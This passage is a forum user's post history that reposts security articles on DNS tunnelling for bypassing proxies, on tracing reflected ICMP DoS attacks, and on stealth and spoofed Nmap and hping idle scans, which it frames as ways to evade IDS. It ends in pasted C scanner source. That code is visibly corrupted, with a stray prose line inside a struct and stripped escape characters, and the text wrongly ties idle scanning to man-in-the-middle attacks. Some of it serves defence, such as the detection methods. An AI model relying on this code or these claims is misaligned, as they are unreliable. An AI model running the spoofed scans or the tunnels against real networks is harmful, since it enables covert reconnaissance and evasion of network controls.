-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
You all know what DNS is, and I don’t think any more information is needed on it. Our Internet world exists due to DNS technology, and exploiting DNS can bring down the Internet for a day or month, or in a particular region. One of the common attacks that we heard about in 2012 was Operation Global Blackout, wherein the attacker ‘Anonymous’ threatened to take down the complete global Internet. Computer security experts were worried and have taken additional layers of protection to secure the network, particularly DNS. Have you ever come up to a scenario where you were not able to access a website because it was blocked by proxy? Then you need to use DNS tunnelling concepts to bypass the proxy. By using DNS tunnelling, a user will be able to access a website even though the proxy is blocking the website. Normally when you consider a proxy server, all the HTTP traffic will be received by a proxy server, but no DNS traffic will fall on a proxy server. So exploiting this DNS traffic will allow us to use all blocked websites as well. So on a DNS tunnel, data are encapsulated within DNS queries and replies, using base32 and base64 encoding, and the DNS domain name lookup system is used to send data bi-directionally. Therefore, as long as you can do domain name lookups on a network, you can tunnel any kind of data you want to a remote system, including the Internet. We use DNS records (NULL/TXT/SRV/MX/CNAME) to encapsulate (downstream) IP traffic. In the above scenario, Users A and B are behind a corporate firewall D, and no websites are allowed from Users A and B, and only traffic via port 53 is allowed from firewall D. User A and User B can use the Internet by exploiting DNS traffic via DNS tunnelling. The DNS server on the left side has a caching capability, so when user A tries to access any websites that are already in the cache, then the request won’t go to the iterative server. If some new request is initiated from User A, then the DNS server will not find its A record in the DNS server, so it will send to an outside DNS server. The maximum length of a DNS query is 255 characters with a limitation of 63 chars per label and is in the form: label3.label2.label1.example. To tunnel data over DNS, we need control of an external DNS server (in our case, the DNS server to the right), and we add two records on the external DNS server. One is NS record and the other is A record. NS (name server) record allows you to delegate a subdomain of your domain to another name server. So if you have a domain laptop.com you can add a NS record like a.laptop.com NS computer.com which means any DNS query to laptop.com will be delegated to computer.com and its subdomains. The other one is the A record, which contains the IP address mapping to domain name. Now if we need to setup a DNS tunnel server, we can install an Iodine, DNS tunnelling script, DNScapy, etc. So in the end machine, there has to be a DNS tunnelling client. Once the connection is done, we can use the SOCKS proxy for an uninterrupted connection. DNS tunnelling is inefficient and the speed is slow. DNS traffic has limited bandwidth to pass data, as it has only the capability to pass small information like DNS request and reply. However, botnets can use DNS tunnelling to act as a covert channel, and these covert channels are very hard to detect. These can be identified only by looking for any C&C information on the DNS in the covert channel. In all network systems nowadays DNS is served as it is, but protocols like HTTP, FTP are one of many methods to analyse and inspect the traffic. So the botnets using DNS tunnelling have a better scope for malware writers. The following are some DNS tunnelling tools: DNS TUNNELLING TOOLS OzymanDNS Dns2tcp Iodine Heyoka DNSCat NSTX DNScapy MagicTunnel, Element53, VPN-over-DNS (Android) VPN over DNS In DNS tunnelling, requests from the clients will be fragmented and will be sent as separate DNS queries. Likewise, reply traffic will also need to be fragmented. DNS uses UDP rather than TCP, so fragmentation and correct assembly need to be done in a fake server. DNS tunnels are commonly used to carry out covert file transfers, C&C server traffic and web browsing. File transfer via DNS is likely to use the DNS traffic aggressively considering the DNS protocol and the encapsulation overhead for transferring data over the tunnel. The C&C server traffic will carry minimal traffic as there will be only usual traffic patterns observed. Web browsing using a DNS tunnel is a mixture of both the above. Security engineers should write signatures promptly to detect such traffic. Some techniques for DNS tunnel detection are flow based detection and character based frequency analysis. Detection DNS tunnelling can be detected by monitoring the size of DNS request and reply queries. It’s likely that tunnelled traffic will have more than 64 characters in DNS. Use of updated IPS and IDS is another detection mechanism. Rules must be configured to monitor a large number of DNS TXT in a DNS server. Rules must be configured in SIEM to trigger if volume of DNS traffic from a particular source is very high. Another method is to use the split horizon DNS concept so that internal addresses are dealt on a specific server; clients should use a proxy server to connect out to the internet, and the proxy server resolves the external DNS for them. Some proxies also have the capability to check the DNS information too. DNSTrap is a tool developed to detect DNS tunnelling by using artificial neural network. In this tool, five attributes are used to train an Artificial Neural Network (ANN) to detect tunnels: the domain name, how many packets are sent to a particular domain, the average length of packets to that domain, the average number of distinct characters in the LLD, and the distance between LLD’s. Next generation firewalls like Paloalto and Fire Eye have the capability to detect DNS tunnelling. References http://psichron.za.net/downloads/dns_tunneling.txt DNS Tunneling made easy [splitbrain.org] http://arxiv.org/ftp/arxiv/papers/1004/1004.4358.pdf Source
-
There are plenty of different ways to track the original source of a DoS attack, but those techniques are not efficient enough to track a reflected ICMP attack. When I say “reflected ICMP attack,” that means a SMURF attack. Here I am going to show you a new model to trackback the reflective DOS attack caused by ICMP packets. This is a very efficient method, because you can do this with the help of a really few attack packets. We have seen that, to detect ICMP attacks in direct attack, we need a large amount of packets to be revised, which is not true in this case. Introduction In this digital era, it is really difficult to protect your network from DOS attack. Big brands have faced this type of attacks even if they secured their network. It is the responsibility of the host that they send and receive packets from their network to the client and vice versa. It destination’s responsibility to receive and verify the packet’s validity sent by the source. Attack Classification There are two types of attacks. Direct attacks Indirect/reflective attacks A direct attack is explained by its name: Packets are sent directly to the victim. However, in a reflective attack, the packets are sent to the intermediate network and then they goes to the victim. This intermediate network can be a custom proxy or a custom network. a SMURF attack is an example of reflective attack. The attacker sends ICMP echo packets to the network; that is called an amplifier. This is done by using the source address, which is the IP address of a victim. Finally, the machine will send the reply to a victim machine. This thing is illustrated in the figure below. How many replies it will get depends on the number of machines connected to that amplifier network. This attack is easy to implement and hard to detect because a single identity can attack a large enterprise, even using only very few machines or resources. Now I am going to show you a new theoretical method to track back the reflective ICMP flood attack. For back-tracking ICMP reflective packets, we have to understand the following terms; 1. Packet Marking This is a very basic approach, in which the router itself adds some information to the packet. By doing this, the router can locate the source of the flow of a packet. This router adds the IP address to the packet header of any packet. The victim constructs the attack path after receiving the marking. That marking is the address of the router that lies between the attacker and the victim. In this case, the victim will need a ton of packets in order to reconstruct a path. To accomplish this process, both the single router and participating routers will need multiple packets to transmit on its own IP address. Figure 1. Marking in IP header 2. ICMP Traceback In this, the reconstructed path is generated by sending the out-of-band traceback details to the destination by a router. There is an old method named iTrace, in which the router sends ICMP echo packets to the destination with an attack path. Due to this, those packets contain details about the marking router. The victim traces back the information after collecting those ICMP packets. Then the victim reconstructs the attack path. In this approach, routers send out-of-band traceback information to the destination of the flow to reconstruct the attack path. Bellovin proposed iTrace [15]. Routers send ICMP packets, along with the attack path, to another destination. The ICMP packets contain information about the marking router. The victim collects the ICMP packets during the attack and extracts traceback information. The victim will be able to reconstruct the attack path. With this new method, fewer signaling packets are used to send to the destination. Whatever studies have been done up to now don’t deal with the reflective attacks. These methods are only dealing with direct attacks. Problems Faced During the Traceback In packet logging, the hash value will be different after reflection, so in that case the traceback approach is not useful. In packet marking, the identification field will be different after any reflection. On top of that, a marking will be received by the victim only after a successful reflection so, in that case, traceback is also not helpful. In the traditional ICMP traceback method, packets that will be received by the victim contain only path information between the amplifier network and the victim, so no legitimate and proper real information about the attacker will be there. Trackback ICMP Attacks ICMP echo packets are only echo request-and-reply packets. This is a novel approach for tracing back the ICMP packets, whether they are direct or indirect packets. It’s a new marking method. In this method, the data field carries all of the tracing back information. Researchers noticed that the ICMP protocol’s behavior remains the same after request and response. In this method, the machine responds with the exact data field contained in the request after receiving the request which also contains the same data field. So, if there is any change in the data field, it will be known by both the receiver and sender. Therefore, packets are sent with this new marking technique, which is explained below. If a machine receives an ICMP echo request, it will respond with the same data field contained in the echo request. So any modification in the data field, whether in the request or the reply, will be received by the destination. In an ICMP direct attack, the attacker will flood the victim either with ICMP requests or with reply messages with our marking for every ICMP echo packet: In this methodology, it does not matter whether the packet is direct or reflective. Using this technique, the marking router will insert the address in the data field in the ICMP message in request as well as in the response. Due to the remaining unchanged data field, the victim will get all traceback information that is related to path between the middle amplifier network as well as attacker. Problem with this approach. A single packet gets passed by 15 or more different routers. This requires a large amount of space to store the marking of all the routers’ information. We have limited space for traceback information storage. Solution. Researchers used probabilistic technique to note down a complete path starting from the attacker and ending to the destination in a proper flow. The victim gets various IP addresses during any attack. Now he will have to reconstruct the attack path. In order to do that, the router copies various TTL fields, with their respective IP addresses, into the data field. To differentiate between echo requests and echo replies, the router uses different bits of TTL. After that, the victim uses these all bits in order to construct the attack path. This scenario is explained in the figure below. Figure 23. New Marking Process of Data Field Practical Implementation Up to now, I have talked about the theoretical technique. In real life, practical implementation should be done as shown in the figure below. Researchers proposed this method of implementing this in a virtual environment by using five routers, three reflectors, and a victim and attacker machine, as shown in the figure. One packet travels from the attacker to the victim, but a necessary condition is that the packet must travel through all the routers that are implemented in the virtual lab. Figure 3 : Scenario of Implementation of this new marking technique Here all machines are using Linux systems and the routers are also allowing packet forwarding mechanism in order to get the marking of each and every ICMP echo request and reply packets. Then a SMURF attack is launched, in which the attacker sends packets to a victim; the packets are passed through all routers. Each router’s responsibility is to mark all packets with their respective TTL and IP addresses. After that, the receiver receives all the packets, analyzes them, and reconstructs the origin of the attack path. Thus, we can trace back the reflective ICMP attacks by using very few packets. Conclusion Using this technique, one can trace back ICMP DoS attacks, including direct and reflective attacks as well. Reflective attacks are known as SMURF attacks. Source
-
This is our second installment of Nmap cheat sheet. Basically, we will discuss some advanced techniques for Nmap scanning and we will conduct a Man In The Middle Attack (MITM). Let’s start our game now. TCP SYN Scan SYN scan is the default and most popular scan option, for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections. Command: nmap –sS target TCP Connect Scan TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. Command: nmap –sT target UDP SCANS While most popular services on the Internet run over the TCP protocol, UDP services are widely deployed. DNS, SNMP, and DHCP (registered ports 53, 161/162, and 67/68) are three of the most common. Because UDP scanning is generally slower and more difficult than TCP, some security auditors ignore these ports. This is a mistake, as exploitable UDP services are quite common and attackers certainly don’t ignore the whole protocol. Command: nmap –sU target The –data-length option can be used to send a fixed-length random payload to every port or (if you specify a value of 0) to disable payloads. If an ICMP port unreachable error (type 3, code 3) is returned, the port is closed. Other ICMP unreachable errors (type 3, codes 1, 2, 9, 10, or 13) mark the port as filtered. Occasionally, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. Command: nmap –sU –data-length=value target SCTP INIT Scan SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN scan. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and stealthy, since it never completes SCTP associations. Command: nmap –sY target TCP NULL, FIN, and Xmas scans NULL scan (-sN) Does not set any bits (TCP flag header is 0). FIN scan (-sF) Sets just the TCP FIN bit. Xmas scan (-sX) Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. TCP ACK Scan This scan is different than the others discussed so far in that it never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not, and which ports are filtered. Command: nmap –scanflags=value –sAtarget The ACK scan probe packet has only the ACK flag set (unless you use –scanflags). When scanning unfiltered systems, open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet. TCP Window Scan Window scan is exactly the same as ACK scan, except that it exploits an implementation detail of certain systems to differentiate open ports from closed ones, rather than always printing unfiltered when an RST is returned. Command: nmap –sW target See the valuable and juicy information which is useful for a hacker to attack further: TCP Maimon Scan The Maimon scan is named after its discoverer, Uriel Maimon. He described the technique in Phrack Magazine issue #49 (November 1996). Nmap, which included this technique, was released two issues later. This technique is exactly the same as NULL, FIN, and Xmas scans, except that the probe is FIN/ACK. Command: nmap –sM target Custom TCP Scan Using –scanflag Options For advance pentesting, a pentester will not use a general TCP scan like ACK, FIN, etc. because these things may be blocked by IDS/IPS. So they will use some different techniques by specifying “-scanflag” options. This also can be used for firewall evading. The –scanflags argument can be a numerical flag value such as 9 (PSH and FIN), but using symbolic names is easier. Just mash together any combination of URG, ACK, PSH, RST, SYN, and FIN. For example, –scanflags URGACKPSHRSTSYNFIN sets everything, though it’s not very useful for scanning. Command: nmap –-scanflags target SCTP COOKIE ECHO Scan SCTP COOKIE ECHO scan is a more advanced SCTP scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports, but send an ABORT if the port is closed. The advantage of this scan type is that it is not as obvious a port scan as an INIT scan. Also, there may be non-stateful firewall rulesets blocking INIT chunks, but not COOKIE ECHO chunks. A good IDS will be able to detect SCTP COOKIE ECHO scans too. The downside is that SCTP COOKIE ECHO scans cannot differentiate between open and filtered ports, leaving you with the state open|filtered in both cases. Command: nmap –-sZ target TCP Idle Scan This advanced scan method allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify. This is very useful for conducting MITM (Man In The Middle Attack). Command: nmap –sI zombie target Victim thought that Zombie was the Attacker machine, which it was actually not. So here the Attacker tried to fool the Victim. Here Zombie means the middle man that you have trusted. Zombie can be any machine which acts like a middle machine between Attacker and Victim.However, we are in advanced pentesting, so let’s try to move ahead with details regarding Idle Scan. History And Details In 1998, security researcher Antirez (who also wrote the hping2 tool used in parts of this book) posted to the Bugtraq mailing list an ingenious new port scanning technique. He called it “dumb scan”. Attackers can actually scan a target without sending a single packet to the target from their own IP address! Instead, a clever side-channel attack allows for the scan to be bounced off a dumb “zombie host”. Intrusion detection system (IDS) reports will finger the innocent zombie as the attacker. Besides being extraordinarily stealthy, this scan type permits discovery of IP-based trust relationships between machines. What Is the Actual Game? Actually, for an attacker to conduct this attack, he does not need to be an expert in TCP/IP, but it is more advanced than other techniques as discussed so far. The below steps are put together to conduct this attack. One way to determine whether a TCP port is open is to send a SYN (session establishment) packet to the port. The target machine will respond with a SYN/ACK (session request acknowledgment) packet if the port is open, and RST (reset) if the port is closed. This is the basis of the previously discussed SYN scan. A machine that receives an unsolicited SYN/ACK packet will respond with a RST. An unsolicited RST will be ignored. Every IP packet on the Internet has a fragment identification number (IP ID). Since many operating systems simply increment this number for each packet they send, probing for the IPID can tell an attacker how many packets have been sent since the last probe. By combining these traits, it is possible to scan a target network while forging your identity so that it looks like an innocent zombie machine did the scanning. Idle Scan Explained To conduct this attack, the following steps may be followed for successful exploitation. Probe the zombie’s IP ID and record it. Forge a SYN packet from the zombie and send it to the desired port on the target. Depending on the port state, the target’s reaction may or may not cause the zombie’s IP ID to be incremented. Probe the zombie’s IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1. How to Determine from IP ID From the IP ID value, an attacker will try to learn about port status, whether it is open or filtered or closed. Read below for details: After the above idle scan process, the zombie’s IP ID should have increased by either one or two. An increase of one indicates that the zombie hasn’t sent out any packets, except for its reply to the attacker’s probe. This lack of sent packets means that the port is not open (the target must have sent the zombie either a RST packet, which was ignored, or nothing at all). An increase of two indicates that the zombie sent out a packet between the two probes. This extra packet usually means that the port is open (the target presumably sent the zombie a SYN/ACK packet in response to the forged SYN, which induced a RST packet from the zombie). Increases larger than two usually signify a bad zombie host. It might not have predictable IP ID numbers, or might be engaged in communication unrelated to the idle scan. See the below images that relate Attacker, Zombie, and Victim, and how the attack is conducted. Idle Scan of an Open Port Step 1: Probe The Zombie’s IP address SYN/ACK RST IPID=31337 The Attacker sends SYN/ACK packets to Zombie. But Zombie is not expecting to get these packets. So in response, he discloses IP ID value by responding with an RST packet to the attacker. Step 2: Forge SYN packet from zombie SYN request from Zombie which is spoofed SYN/ACK to Zombie RST packet.IP ID:31338 The Victim sends a SYN/ACK packet in response to the SYN packet that appears to come from Zombie. The Zombie sends back RST by incrementing IP ID value. Step3: Probe Zombie’s IP ID again SYN/ACK Zombie RST,IP ID:31339 The Zombie’s IP ID increased by two, which is learned from step one. So here we know that the port is open from the IPID value. Note: If the port is closed, then the IPID value will be increased by one. If the Zombie’s IP ID increased by one as in the first step, we can say that it may be closed or filtered. In the case of filtered, the Victim has no response to Zombie for the SYN request of Attacker. In this situation, an Attacker will learn that there may be IDS/IPS which have rules to block some certain scan attempts by Zombie machines. For that, he will again use decoy options for Nmap to evade that. We will discuss that later. Step 1: Finding Zombie Host for Idle Scan The first step in executing an IP ID idle scan is to find an appropriate zombie. It needs to assign IP ID packets incrementally on a global (rather than per-host it communicates with) basis. It should be idle (hence the scan name), as extraneous traffic will bump up its IP ID sequence, confusing the scan logic. A common approach is to simply execute a Nmap ping scan of some network. We can use Nmap’s random IP selection mode (-iR), but that is likely to result in far away zombies with substantial latency. Performing a port scan and OS identification (-O) on the zombie candidate network, rather than just a ping scan, helps in selecting a good zombie. As long as verbose mode (-v) is enabled, OS detection will usually determine the IP ID sequence generation method and print a line such as “IP ID Sequence Generation: Incremental”. If the type is given as Incremental or Broken little-endian incremental, the machine is a good zombie candidate. Another approach to identifying zombie candidates is to run the ipidseq NSE script against a host. This script probes a host to classify its IP ID generation method, then prints the IP ID classification, much like the OS detection does. Command: (nmap –script ipidseq [--script-args probeport=port] target) Now we can tell that it is incremental and a good candidate for Zombie. Using Hping We can also use hping for discovering a zombie. The hping method for idle scanning provides a lower level example for how idle scanning is performed. In this example, the target host (target1) will be scanned using an idle host (target2). An open and a closed port will be tested to see how each scenario plays out. First, establish that the idle host is actually idle, send packets using hping2 and observe the ID numbers increase incrementally by one. If the ID numbers increase haphazardly, the host is not actually idle, or has an OS that has no predictable IP ID. hping3 -S target Send a spoofed SYN packet to the target host on a port you expect to be open. hping3 –spoof Zombie -S p 22 target *Note: Here I do not want to include the screenshot. Though this is a part of research and this document is for only educational purposes, the owner of the website does not want to disclose it. If you have any doubt you can contact me here or email me. As you can see, there is no response and it shows 100% packet loss. That means we have failed to find the zombie. Again we will check the following step for confirmation. Check the IPID value for any increment: hping3 -S target No response. It includes that the port is filtered. Attack using Nmap See the image below. We are attacking the target machine using a zombie host. Command: nmap –Pn –p- -sI zombie target First we will do an Nmap scan for ports: Based on that, let’s try port 22, which is already running. Here we are unable to attack to the target, as it is showing the port is already used for some other purpose. By default, Nmap forges probes to the target from the source port 80 of the zombie. You can choose a different port by appending a colon and port number to the zombie name (e.g. -sI zombie:113). The chosen port must not be filtered from the attacker or the target. A SYN scan of the zombie should show the port in the open or closed state. Here –Pn: prevents Nmap from sending the initial packets to the target machine. -p-: will scan all 65535 ports. -sI: used for idle scan and sending spoof packets. Here what happens, the attacker’s IDS will think that the packet is coming from a zombie machine, not from the target machine. So he will be confused. Understanding Nmap Internally As a pentester, we must understand internal workings of Nmap’s idle scan, so that we will craft the same thing in our own implementation. Even we can write our own code based on Python to do the same thing. We must understand the basic flow or algorithm of Nmap’s idle scan. For that, we will use packet trace options in Nmap. Command: nmap -sI Zombie:113 -Pn -p20-80,110-180 -r –packet-trace -v target -Pn is necessary for stealth, otherwise pinged packets would be sent to the target from the attacker’s real address. Version scanning would also expose the true address, -sV is not specified. The -r option (turns off port randomization) is only used to make this example easier. As I said before, use a suitable zombie port for successful attack. Process of this attack: Nmap firsts tests Zombie’s IP ID sequence generation by sending six SYN/ACK packets to it and analyzing the responses. Here R means Reset packet. That means that is not reachable through that port, though that is already used for other services. For more details, follow the Idle Scan by Nmap Manual (TCP Idle Scan (-sI)). Here is a vulnerable machine with a suitable zombie for a successful attack. So the below mentioned C code is for idle scan. Compile the C program and run the code. This is an extraordinary scan code that can allow for completely blind scanning (eg. no packets sent to the target from your own IP address) and can also be used to penetrate firewalls and scope out router ACLs. #include "idle_scan.h" #include "timing.h" #include "osscan2.h" #include "nmap.h" #include "NmapOps.h" #include "services.h" #include "Target.h" #include "utils.h" #include "output.h" #include "struct_ip.h" #include extern NmapOps o; struct idle_proxy_info { create a constructer and take all variable into it Target host; /* contains name, IP, source IP, timing info, etc. */ int seqclass; /* IP ID sequence class (IPID_SEQ_* defined in nmap.h) */ u16 latestid; /* The most recent IP ID we have received from the proxy */ u16 probe_port; /* The port we use for probing IP ID infoz */ u16 max_groupsz; /* We won't test groups larger than this ... */ u16 min_groupsz; /* We won't allow the group size to fall below this level. Affected by --min-parallelism */ double current_groupsz; /* Current group size being used ... depends on conditions ... won't be higher than max_groupsz */ int senddelay; /* Delay between sending pr0be SYN packets to target (in microseconds) */ int max_senddelay; /* Maximum time we are allowed to wait between sending pr0bes (when we send a bunch in a row. In microseconds. */ pcap_t *pd; /* A Pcap descriptor which (starting in initialize_idleproxy) listens for TCP packets from the probe_port of the proxy box */ int rawsd; /* Socket descriptor for sending probe packets to the proxy */ struct eth_nfo eth; // For when we want to send probes via raw IP instead. struct eth_nfo *ethptr; // points to eth if filled out, otherwise NULL }; /* Sends an IP ID probe to the proxy machine and returns the IP ID. This function handles retransmissions, and returns -1 if it fails. Proxy timing is adjusted, but proxy->latestid is NOT ADJUSTED -- you'll have to do that yourself. Probes_sent is set to the number of probe packets sent during execution */ static int ipid_proxy_probe(struct idle_proxy_info *proxy, int *probes_sent, int *probes_rcvd) { struct timeval tv_end; int tries = 0; int trynum; int sent=0, rcvd=0; int maxtries = 3; /* The maximum number of tries before we give up */ struct timeval tv_sent[3], rcvdtime; int ipid = -1; int to_usec; unsigned int bytes; int base_port; struct ip *ip; struct tcp_hdr *tcp; static u32 seq_base = 0; static u32 ack = 0; static int packet_send_count = 0; /* Total # of probes sent by this program -- to ensure that our sequence # always changes */ if (o.magic_port_set) base_port = o.magic_port; else base_port = o.magic_port + get_random_u8(); if (seq_base == 0) seq_base = get_random_u32(); if (!ack) ack = get_random_u32(); do { gettimeofday(&tv_sent[tries], NULL); /* Time to send the pr0be!*/ send_tcp_raw(proxy->rawsd, proxy->ethptr, proxy->host.v4sourceip(), proxy->host.v4hostip(), o.ttl, false, o.ipoptions, o.ipoptionslen, base_port + tries, proxy->probe_port, seq_base + (packet_send_count++ * 500) + 1, ack, 0, TH_SYN|TH_ACK, 0, 0, (u8 *) "x02x04x05xb4", 4, NULL, 0); sent++; tries++; /* Now it is time to wait for the response ... */ to_usec = proxy->host.to.timeout; gettimeofday(&tv_end, NULL); while((ipid == -1 || sent > rcvd) && to_usec > 0) { to_usec = proxy->host.to.timeout - TIMEVAL_SUBTRACT(tv_end, tv_sent[tries-1]); if (to_usec < 0) to_usec = 0; // Final no-block poll ip = (struct ip *) readipv4_pcap(proxy->pd, &bytes, to_usec, &rcvdtime, NULL, true); gettimeofday(&tv_end, NULL); if (ip) { if (bytes < ( 4 * ip->ip_hl) + 14U) continue; if (ip->ip_p == IPPROTO_TCP) { tcp = ((struct tcp_hdr *) (((char *) ip) + 4 * ip->ip_hl)); if (ntohs(tcp->th_dport) < base_port || ntohs(tcp->th_dport) - base_port >= tries || ntohs(tcp->th_sport) != proxy->probe_port || ((tcp->th_flags & TH_RST) == 0)) { if (ntohs(tcp->th_dport) > o.magic_port && ntohs(tcp->th_dport) < (o.magic_port + 260)) { if (o.debugging) { error("Received IP ID zombie probe response which probably came from an earlier prober instance ... increasing rttvar from %d to %d", proxy->host.to.rttvar, (int) (proxy->host.to.rttvar * 1.2)); } proxy->host.to.rttvar = (int) (proxy->host.to.rttvar * 1.2); rcvd++; } else if (o.debugging > 1) { error("Received unexpected response packet from %s during IP ID zombie probing:", inet_ntoa(ip->ip_src)); readtcppacket( (unsigned char *) ip,MIN(ntohs(ip->ip_len), bytes)); } continue; } trynum = ntohs(tcp->th_dport) - base_port; rcvd++; ipid = ntohs(ip->ip_id); adjust_timeouts2(&(tv_sent[trynum]), &rcvdtime, &(proxy->host.to)); } } } } while(ipid == -1 && tries < maxtries); if (probes_sent) *probes_sent = sent; if (probes_rcvd) *probes_rcvd = rcvd; return ipid; } /* Returns the number of increments between an early IP ID and a later one, assuming the given IP ID Sequencing class. Returns -1 if the distance cannot be determined */ static int ipid_distance(int seqclass , u16 startid, u16 endid) { if (seqclass == IPID_SEQ_INCR) return endid - startid; if (seqclass == IPID_SEQ_BROKEN_INCR) { /* Convert to network byte order */ startid = htons(startid); endid = htons(endid); return endid - startid; } return -1; } static void initialize_proxy_struct(struct idle_proxy_info *proxy) { proxy->seqclass = proxy->latestid = proxy->probe_port = 0; proxy->max_groupsz = proxy->min_groupsz = 0; proxy->current_groupsz = 0; proxy->senddelay = 0; proxy->max_senddelay = 0; proxy->pd = NULL; proxy->rawsd = -1; proxy->ethptr = NULL; } /* takes a proxy name/IP, resolves it if necessary, tests it for IP ID suitability, and fills out an idle_proxy_info structure. If the proxy is determined to be unsuitable, the function whines and exits the program */ #define NUM_IPID_PROBES 6 static void initialize_idleproxy(struct idle_proxy_info *proxy, char *proxyName, const struct in_addr *first_target, const struct scan_lists * ports) { int probes_sent = 0, probes_returned = 0; int hardtimeout = 9000000; /* Generally don't wait more than 9 secs total */ unsigned int bytes, to_usec; int timedout = 0; char *p, *q; char *endptr = NULL; int seq_response_num; int newipid; int i; char filter[512]; /* Libpcap filter string */ char name[MAXHOSTNAMELEN + 1]; struct sockaddr_storage ss; size_t sslen; u32 sequence_base; u32 ack = 0; struct timeval probe_send_times[NUM_IPID_PROBES], tmptv, rcvdtime; u16 lastipid = 0; struct ip *ip; struct tcp_hdr *tcp; int distance; int ipids[NUM_IPID_PROBES]; u8 probe_returned[NUM_IPID_PROBES]; struct route_nfo rnfo; assert(proxy); assert(proxyName); ack = get_random_u32(); for(i=0; i < NUM_IPID_PROBES; i++) probe_returned[i] = 0; initialize_proxy_struct(proxy); initialize_timeout_info(&proxy->host.to); proxy->max_groupsz = (o.max_parallelism)? o.max_parallelism : 100; proxy->min_groupsz = (o.min_parallelism)? o.min_parallelism : 4; proxy->max_senddelay = 100000; Strncpy(name, proxyName, sizeof(name)); q = strchr(name, ':'); if (q) { *q++ = '\0'; proxy->probe_port = strtoul(q, &endptr, 10); if (*q==0 || !endptr || *endptr != '\0' || !proxy->probe_port) { fatal("Invalid port number given in IP ID zombie specification: %s", proxyName); } } else { if (ports->syn_ping_count > 0) { proxy->probe_port = ports->syn_ping_ports[0]; } else if (ports->ack_ping_count > 0) { proxy->probe_port = ports->ack_ping_ports[0]; } else { u16 *ports; int count; getpts_simple(DEFAULT_TCP_PROBE_PORT_SPEC, SCAN_TCP_PORT, &ports, &count); assert(count > 0); proxy->probe_port = ports[0]; free(ports); } } proxy->host.setHostName(name); if (resolve(name, 0, 0, &ss, &sslen, o.pf()) == 0) { fatal("Could not resolve idle scan zombie host: %s", name); } proxy->host.setTargetSockAddr(&ss, sslen); /* Lets figure out the appropriate source address to use when sending the pr0bez */ proxy->host.TargetSockAddr(&ss, &sslen); if (!nmap_route_dst(&ss, &rnfo)) fatal("Unable to find appropriate source address and device interface to use when sending packets to %s", proxyName); if (o.spoofsource) { o.SourceSockAddr(&ss, &sslen); proxy->host.setSourceSockAddr(&ss, sslen); proxy->host.setDeviceNames(o.device, o.device); } else { proxy->host.setDeviceNames(rnfo.ii.devname, rnfo.ii.devfullname); proxy->host.setSourceSockAddr(&rnfo.srcaddr, sizeof(rnfo.srcaddr)); } if (rnfo.direct_connect) { proxy->host.setDirectlyConnected(true); } else { proxy->host.setDirectlyConnected(false); proxy->host.setNextHop(&rnfo.nexthop, sizeof(rnfo.nexthop)); } proxy->host.setIfType(rnfo.ii.device_type); if (rnfo.ii.device_type == devt_ethernet) proxy->host.setSrcMACAddress(rnfo.ii.mac); /* Now lets send some probes to check IP ID algorithm ... */ /* First we need a raw socket ... */ if ((o.sendpref & PACKET_SEND_ETH) && proxy->host.ifType() == devt_ethernet) { if (!setTargetNextHopMAC(&proxy->host)) fatal("%s: Failed to determine dst MAC address for Idle proxy", __func__); memcpy(proxy->eth.srcmac, proxy->host.SrcMACAddress(), 6); memcpy(proxy->eth.dstmac, proxy->host.NextHopMACAddress(), 6); proxy->eth.ethsd = eth_open_cached(proxy->host.deviceName()); if (proxy->eth.ethsd == NULL) fatal("%s: Failed to open ethernet device (%s)", __func__, proxy->host.deviceName()); proxy->rawsd = -1; proxy->ethptr = &proxy->eth; } else { #ifdef WIN32 win32_fatal_raw_sockets(proxy->host.deviceName()); #endif if ((proxy->rawsd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 ) pfatal("socket troubles in %s", __func__); unblock_socket(proxy->rawsd); broadcast_socket(proxy->rawsd); #ifndef WIN32 sethdrinclude(proxy->rawsd); #endif proxy->eth.ethsd = NULL; proxy->ethptr = NULL; } /* Now for the pcap opening nonsense ... */ /* Note that the snaplen is 152 = 64 byte max IPhdr + 24 byte max link_layer * header + 64 byte max TCP header. */ if((proxy->pd=my_pcap_open_live(proxy->host.deviceName(), 152, (o.spoofsource)? 1 : 0, 50))==NULL) fatal("%s", PCAP_OPEN_ERRMSG); p = strdup(proxy->host.targetipstr()); q = strdup(inet_ntoa(proxy->host.v4source())); Snprintf(filter, sizeof(filter), "tcp and src host %s and dst host %s and src port %hu", p, q, proxy->probe_port); free(p); free(q); set_pcap_filter(proxy->host.deviceFullName(), proxy->pd, filter); if (o.debugging) log_write(LOG_STDOUT, "Packet capture filter (device %s): %sn", proxy->host.deviceFullName(), filter); /* Windows nonsense -- I am not sure why this is needed, but I should get rid of it at sometime */ sequence_base = get_random_u32(); /* Yahoo! It is finally time to send our pr0beZ! */ while(probes_sent < NUM_IPID_PROBES) { if (o.scan_delay) enforce_scan_delay(NULL); else if (probes_sent) usleep(30000); /* TH_SYN|TH_ACK is what the proxy will really be receiving from the target, and is more likely to get through firewalls. But TH_SYN allows us to get a nonzero ACK back so we can associate a response with the exact request for timing purposes. So I think I'll use TH_SYN, although it is a tough call. */ /* We can't use decoys 'cause that would screw up the IP IDs */ send_tcp_raw(proxy->rawsd, proxy->ethptr, proxy->host.v4sourceip(), proxy->host.v4hostip(), o.ttl, false, o.ipoptions, 